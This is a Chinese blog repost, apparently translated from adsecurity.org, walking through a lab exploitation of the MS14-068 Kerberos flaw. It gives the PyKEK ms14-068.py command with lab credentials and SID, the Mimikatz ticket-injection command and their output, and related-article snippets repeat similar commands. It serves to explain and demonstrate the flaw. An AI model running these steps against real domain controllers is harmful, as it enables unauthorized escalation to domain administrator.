[译]使用Kerberos Exploitation Kit攻击MS14-068漏洞

最新推荐文章于 2023-04-27 21:41:49 发布
最新推荐文章于 2023-04-27 21:41:49 发布
阅读量412 收藏
点赞数
分类专栏: windows 内网 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82611166
版权
原文地址:http://adsecurity.org/?p=676

Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击

本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC

[color=blue][b]开始攻击[/b][/color]
攻击账户为[color=blue]darthsidious@lab.adsecurity.org[/color],该账户属于域用户和工作站组。假定该用户是网络中授权用户,以及希望获得域管理员权限来进行恶意行为。用户已经获得域账户并且知道密码。
[img]http://dl2.iteye.com/upload/attachment/0104/3710/a39d7182-e1d5-3947-88c2-4a46cc3ae07f.png[/img]
当攻击者获得某台电脑的域口令和本地管理员权限后,他可以利用PyKEK通过与DC进行标准通信来伪造一个TGT。

PyKEK ms14-068.py脚步需要下列信息来声称TGT:
[quote]Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org
Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
目标Domain Controller [-d]: adsdc02.lab.adsecurity.org[/quote]

可以通过whoami命令来获得SID
[img]http://dl2.iteye.com/upload/attachment/0104/3712/0628f062-0d71-374b-b3bf-f7373681d175.png[/img]
可以在powershell中运行下列命令获得: 
 [Security.Principal.WindowsIdentity]::GetCurrent( )

[img]http://dl2.iteye.com/upload/attachment/0104/3715/8cb68a40-85ff-3688-bd86-7186d6a694dc.png[/img]

[color=blue]第一阶段--生成TGT[/color]
[img]http://dl2.iteye.com/upload/attachment/0104/3717/f5244831-3de2-3de9-90c0-d953ab68046a.png[/img]
生成的TGT Kerberos票据保存在ccache文件中,然后可以使用Mimikatz copy到windows电脑中
[quote]
[color=blue][b]c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912[/b][/color]
7-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done!
[/quote]
[img]http://dl2.iteye.com/upload/attachment/0104/3719/496631d1-7744-38a9-b151-f577d0ee90ad.png[/img]
接下来使用本地管理员权限登陆电脑来连接到目标DC。
whoami命令显示我是ADSWKWIN7电脑的管理员。
klist显示当前没有Kerberos票据。
PyKEK ms14-068.py脚本把生成的TGT保存到一个ccache文件中(c:\temp\pykek )

[color=blue][b]第二阶段--注入TGT获得TGS[/b][/color]
使用Mimikatz 来注入
[quote]
[color=red][b]c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc [/b][/color]c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit
.#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 15 modules * * */
mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt
af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
[/quote]
因为我注入一个伪造(声明我是域管理员)的TGT到我的session中,所以当TGT传递到一个未patched的DC,ticket表明我是这些组的成员。
[img]http://dl2.iteye.com/upload/attachment/0104/3722/4e7b9a86-da0b-37dd-9c1a-642864603615.png[/img]
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms14-068之metasploit应用
zz_strive_2012的专栏
06-17 3088
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum msf auxiliary(ms14_068_kerberos_checksum) > show options5 U- @! U" R, X9 F: i Module options (auxiliary/admin/kerberos/ms14_068_
内核漏洞进击之旅——Dark Composition Exploitation Case Study
qq_36606493的博客
10-12 1311
作者:k0shl 0x00 前言 尝试写这个 Exploit 的起因是邱神 @pgboy1988 在3月份的一条微博,这是邱神和社哥在 cansecwest2017上的议题《Win32k Dark Composition--Attacking the Shadow Part of Graphic Subsystem》,后来邱神在微博公开了这个议题的 slide,以及议题中两个 demo
ms14-068域提权
zz_strive_2012的专栏
06-17 2445
一、利用mimakatz.exe来抓取域用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。域用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
MS14-068提权
weixin_30402343的博客
06-18 240
Ms14-068 • 库 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷贝 TGT_user1@lab.com.ccache 到windows系统 • 本地管理员登陆 • mimikatz...
ms14-068.exe域内神器
11-25
【标题】"ms14-068.exe域内神器" 涉及的主要知识点是Microsoft在2014年发布的安全更新公告MS14-068,它与Windows操作系统中的Kerberos认证漏洞有关。这个漏洞允许攻击者通过精心构造的请求,绕过域控制器的安全验证...
ms14-068利用工具包.zip
07-01
总结,"ms14-068利用工具包.zip" 是一个针对MS14-068漏洞的工具集合,包括可能的漏洞利用程序和一个64位的Kerberos测试环境。这个工具包对安全研究人员和系统管理员来说是重要的资源,他们可以使用这些工具来测试其...
Get-MS14-068:快速简单的Powershell脚本来扫描事件日志,以了解MS14-068开发的可能指标
05-16
MS14-068漏洞,也被称为"Kerberos金票"漏洞,主要影响Windows Server 2003至2012 R2以及Windows XP至8.1等操作系统。攻击者利用此漏洞可获得域控制器的完全访问权限,进而控制整个网络。因此,及时发现并修复这个...
MS14-068AD域提权神器
05-24
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
KerberosPrinciple-Chinese:Kerberos原理--经典对话 中文版
05-01
Kerberos原理--经典对话 中文版最近在学习Kerberos原理,无意间发现了,好家伙全是英文,果断网上寻找中文版。但网上的翻水平实在不敢恭维,很多都是机翻,读都读不通,这个我觉得还好。让我要命的是,连最基本的...
pykek:Kerberos 漏洞利用工具包
07-08
Python Kerberos 漏洞利用工具包 PyKEK(Python Kerberos Exploitation Kit),一个用于操作 KRB5 相关数据的 Python 库。 (仍在开发中) 目前,仅实现了少数功能(以相当快速的方式)来利用 MS14-068 (CVE-2014-6324) 。 更多来了…… 作者 西尔万·蒙内 联系人:solucom dot fr 的 sylvain dot monne 图书馆内容 kek.krb5:Kerberos V5 ( ) ASN.1 结构和基本协议功能 kek.ccache:凭证缓存二进制格式 ( ) kek.pac:微软特权属性证书数据结构( ) kek.crypto:KerberosMS 特定的加密函数 漏洞利用 ms14-068.py 利用 Active Directory 域的未打补丁的域控制器上的漏洞获取具
域用户提权 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 813
环境 & 工具: win2008 --域控 – 192.168.3.133 win2012 --域内主机 – 192.168.3.132 域:qf.com 域内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个域内用户的用户名和密码以及该用户的sid,获取了域内一台主机的权限 1,使用普通域用户登录域内主机Win2012,
域内提权神器 MS14-068 完整EXP
shaolj666的博客
10-11 601
提权: 会提权的兄弟应该都知道 域的权限是整个局域网最高统治权 当我们拿下一台服务器 只是域下的一台机器 这时候 就会想尽办法 拿下域控制服务器 不知道的可看本博客之前做的教程 可以让任何域内用户提升为域管理员 使用命令: c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local mimikatz
MS14-068复现
https://www.cnblogs.com/zpchcbd/
09-15 703
kerberos认证流程非常的重要 1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 1)先查看自己的klist 如...
通过 Cobalt Strike 利用 ms14-068
weixin_30737363的博客
11-19 806
拓扑图 攻击者(kali) 位于 192.168.245.0/24 网段,域环境位于 192.168.31.0/24 网段。 域中有一台 win7 有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入域环境。 假设现在已经有一组域用户的账号密码 user1 321!@#qwe 获取用户的 sid whoami /user 下面使用 pykek 生成票据,首先用 cs 开一个 socks...
MS14-068
xiaoxuetu_的博客
07-29 905
危害: 允许攻击者将非特权的域用户帐户权限提升为域管理员帐户的权限。 MS14-068漏洞利用过程: 请求没有PAC作为标准用户的Kerberos TGT身份验证凭证,DC使用TGT进行回复(没有PAC通常包含组成员资格,这是不寻常的)。生成伪造的PAC,没有密钥,所以生成的PAC使用域用户的密码数据使用MD5算法而不是HMAC_MD5“签名”。将无PAC的TGT发送到DC,将伪
域***提权之MS14-068
weixin_33728708的博客
01-12 302
0x00 前言 在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。 0x01 准备工作 域成员账号及密码一个 mimikatz ms14-068.exe 03以上服务器或pc 0x02 模拟环境 域控制器 2008r2 dc.test.co...
域渗透02-SYSVOL 漏洞 (MS14-025)
GalaxySpaceX的博客
04-27 511
SYSVOL 漏洞 (MS14-025)原理加利用
域内提权之MS14-068
good good study
03-17 4680
目标:普通域成员——>域管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机 有这台域内计算机的域用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),域成员 1. win7获取域账户的密码及sid值 win7机器上查看域管理员,可发现,并没有自己 这里使用mimikatz去抓取域用户的明文密码 mimikatz.exe "privilege:....
ms14-068漏洞利用的前提
最新发布
05-22
MS14-068漏洞是一个远程代码执行漏洞,存在于Windows Active Directory服务中。要利用此漏洞攻击者需要满足以下条件: ...因此,对于使用Windows Active Directory服务的组织来说,修补MS14-068漏洞非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值